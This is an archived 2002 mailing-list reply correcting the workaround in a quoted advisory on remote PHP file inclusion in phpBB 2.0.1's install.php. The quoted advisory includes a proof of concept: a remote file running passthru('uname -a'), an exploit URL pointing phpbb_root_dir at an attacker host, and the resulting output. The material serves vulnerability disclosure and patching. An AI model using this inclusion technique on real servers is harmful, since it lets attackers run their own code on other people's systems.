Re: malicious PHP source injection in phpBB

From: Jonathan Haase (jlhaaseat_private)
Date: Mon Jun 17 2002 - 14:20:21 PDT

Next message: Jedi/Sector One: "Re: Another small metacharacter bug in Penguin Traceroute v1.0"

Previous message: Niels Provos: "external policy enforcement [Re: Apache httpd: vulnerability...]"
In reply to: morris Chang: "malicious PHP source injection in phpBB"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Note... The suggested fix for this in the php code below is very 
incorrect and will in fact leave install.php even more wide open 
than it currently is...

The correct fix to the php code should be to change the line on 
or about line 28 which reads...
include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);

to read more properly

include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

Thanks,

Jonathan L. Haase


On Sunday 16 June 2002 8:29 am, morris Chang wrote:
> JCC Security Advisory
> June 16, 2002
>
> malicious PHP source injection in phpBB
>
> Description
>
> phpBB is one of popular PHP bulletin board systems.
> When allow_url_fopen = On and register_globals = On in
> php.ini, phpBB has vulnerability because install.php contains
> dangerous codes. So an attacker can include any files into
> server's PHP codes.
>
> Impact
>
> It's tested on phpBB 2.0.1. but I think all of phpBB 2 is
> affected.
>
> Workaround
>
> allow_url_fopen = off and register_globals = off.
> and if complete install remove or rename install.php.
> Or in install.php
> -------install.php------------
> define('IN_PHPBB', true);
> $phpbb_root_path='./';
> ----------------------------
> Put it
> -------snip-----------------
> $phpbb_root_dir='./';
> ----------------------------
>
> Good idea to code that <<PHP_CODE
> ini_set("register_globals", "Off");
> ini_set ("allow_url_fopen", "Off");
> PHP_CODE
>
> Tested systems
>
> phpBB 2.0.1 Debian GNU/Linux SID(x86)
>
> Background
>
> We checked the vulnerability with
> "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and
> made a sample code, functions_selects.php,
>
> --------------------includes/functions_selects.php------------
>-- <? passthru("uname -a"); ?>
> -----------------------------------------
>
> and type the following URL to invoke this sample code.
>
> TEST URL :
> http://URL/install.php?phpbb_root_dir=http://MYBOX/"
>
> -------out put----------------------------
> Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686
> unknown Warning: Cannot add header information - headers
> already sent by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 182
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 183
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/install.php on line 346
> -----------------------------------------
>
> thx for BlackKnight at r0ar
> ---
> http://jcc.hackerslab.org(at morris Chang)
>
> e-mail : morrisat_private

Next message: Jedi/Sector One: "Re: Another small metacharacter bug in Penguin Traceroute v1.0"
Previous message: Niels Provos: "external policy enforcement [Re: Apache httpd: vulnerability...]"
In reply to: morris Chang: "malicious PHP source injection in phpBB"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jun 18 2002 - 14:36:17 PDT